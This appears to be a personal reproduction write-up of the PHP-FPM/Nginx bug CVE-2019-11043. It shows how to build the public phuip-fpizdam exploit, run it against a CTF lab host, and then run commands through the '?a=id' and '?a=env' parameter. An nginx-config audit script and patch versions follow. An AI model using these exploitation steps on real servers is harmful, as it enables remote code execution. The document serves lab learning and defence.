1. Overview
The root cause is an env_path_info underflow in PHP-FPM, in the file sapi/fpm/fpm/fpm_main.c (CVE-2019-11043). An attacker places a URL-encoded newline (%0a) in the request path; the regular expression behind Nginx's fastcgi_split_path_info cannot match across that newline, so the PATH_INFO that Nginx hands to PHP-FPM is empty, and that empty value triggers the faulty pointer arithmetic. By sending specially crafted URLs, and under certain Nginx configurations, this results in arbitrary code execution.
2. Reproduction environment (the exploit is written in Go and has to be compiled, so set up a Go toolchain properly)
1) Download the Go language package
wget https://studygolang.com/dl/golang/go1.10.3.linux-amd64.tar.gz
2) Extract it under /usr/local/
root@Mke:/usr/local# tar -C /usr/local -xzf go1.10.3.linux-amd64.tar.gz
3) Append the following line to the end of /etc/profile
vim /etc/profile
##### This line adds the Go binaries to PATH so that go can be called from anywhere
export PATH=$PATH:/usr/local/go/bin
4) Make the configuration take effect
source /etc/profile
Check the Go environment.
Perfect.
3. Download the exploit (exp)
go get github.com/neex/phuip-fpizdam ####after the download finishes, a go directory appears in the current directory (with Go 1.10 this is GOPATH, which defaults to $HOME/go, so run this from your home directory)
cd go/src/ ####change into this directory and compile the Go source
go build github.com/neex/phuip-fpizdam ####when compilation finishes, a phuip-fpizdam binary is produced in the current directory
4. Testing the vulnerability
Target: http://613-d9f884cd-dfd6-4afa-985b-5a215d575ad9node3.buuoj.cn:26779/index.php
Note: I could not be bothered to build the vulnerable environment, so I used the buuctf environment as the target range (yes, Master Zhao is awesome!!!)
The attack steps:
./phuip-fpizdam <target address>/index.php
Visit the target address once
Check the current privileges
http://613-d9f884cd-dfd6-4afa-985b-5a215d575ad9node3.buuoj.cn:26779/index.php?a=id
That basically completes the reproduction. The injected state lives in the PHP-FPM worker process the exploit managed to corrupt, so if ?a=id comes back with the ordinary page instead of command output, repeat the request a few times until it is served by a poisoned worker.
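The "certain configurations" the overview mentions are location blocks that forward $fastcgi_path_info to PHP-FPM with no check that the script actually exists. As an added example (my code, not from the original post or from the tool), the following Python puts a constructed vulnerable block next to a hardened one and flags the exploitable shape with a simple line-based check; the nginx fragments and the audit heuristic are my assumptions, not a full nginx parser.

```python
import re

# Constructed nginx fragments (not taken from the target). The first is the
# shape the exploit needs: the split regex feeds PATH_INFO straight through
# and nothing checks that the script exists before the request reaches PHP-FPM.
VULNERABLE_LOCATION = r"""
location ~ [^/]\.php(/|$) {
    fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    include fastcgi_params;
    fastcgi_pass 127.0.0.1:9000;
}
"""

# Same block with the usual Nginx-side mitigation: with %0a in the URI the
# split fails, $fastcgi_script_name becomes the whole URI, that path is not a
# file, and try_files answers 404 before PHP-FPM ever sees PATH_INFO="".
HARDENED_LOCATION = r"""
location ~ [^/]\.php(/|$) {
    fastcgi_split_path_info ^(.+?\.php)(/.*)$;
    try_files $fastcgi_script_name =404;
    fastcgi_param PATH_INFO $fastcgi_path_info;
    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
    include fastcgi_params;
    fastcgi_pass 127.0.0.1:9000;
}
"""

PATH_INFO_PASSTHROUGH = re.compile(r"^fastcgi_param\s+PATH_INFO\s+\$fastcgi_path_info\s*;")


def directives(block):
    """Strip comments, blank lines and the braces of one location block."""
    out = []
    for line in block.splitlines():
        line = line.split("#", 1)[0].strip()
        if line and not line.startswith("location") and line != "}":
            out.append(line)
    return out


def audit_location(block):
    """Return findings for one PHP location block; an empty list means the
    exploit precondition is not present (heuristic, not a full nginx parser)."""
    lines = directives(block)
    splits = any(l.startswith("fastcgi_split_path_info") for l in lines)
    passes = any(PATH_INFO_PASSTHROUGH.match(l) for l in lines)
    # Either an explicit try_files or the older 'if (!-f ...) { return 404; }'
    # idiom stops non-existent script paths from reaching PHP-FPM.
    guarded = any(l.startswith("try_files") or l.startswith("if (!-f") for l in lines)
    findings = []
    if splits and passes and not guarded:
        findings.append("PATH_INFO from fastcgi_split_path_info is forwarded with no "
                        "existence check; a %0a in the URI reaches PHP-FPM as PATH_INFO=''")
    return findings


def is_exploitable_shape(block):
    """True when the block has the configuration the exploit relies on."""
    return bool(audit_location(block))


if __name__ == "__main__":
    for name, block in (("vulnerable", VULNERABLE_LOCATION), ("hardened", HARDENED_LOCATION)):
        print(name, audit_location(block) or "no findings")
```

The try_files line only closes the Nginx-side trigger; the underflow itself is in PHP-FPM, so the real fix is updating PHP to 7.1.33, 7.2.24, 7.3.11 or later, and the config check is just a way to triage which vhosts are reachable in the meantime.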
Rookie notes, 2020-1-14
A bonus at the end: the parameter a=env gets you the flag. /laughs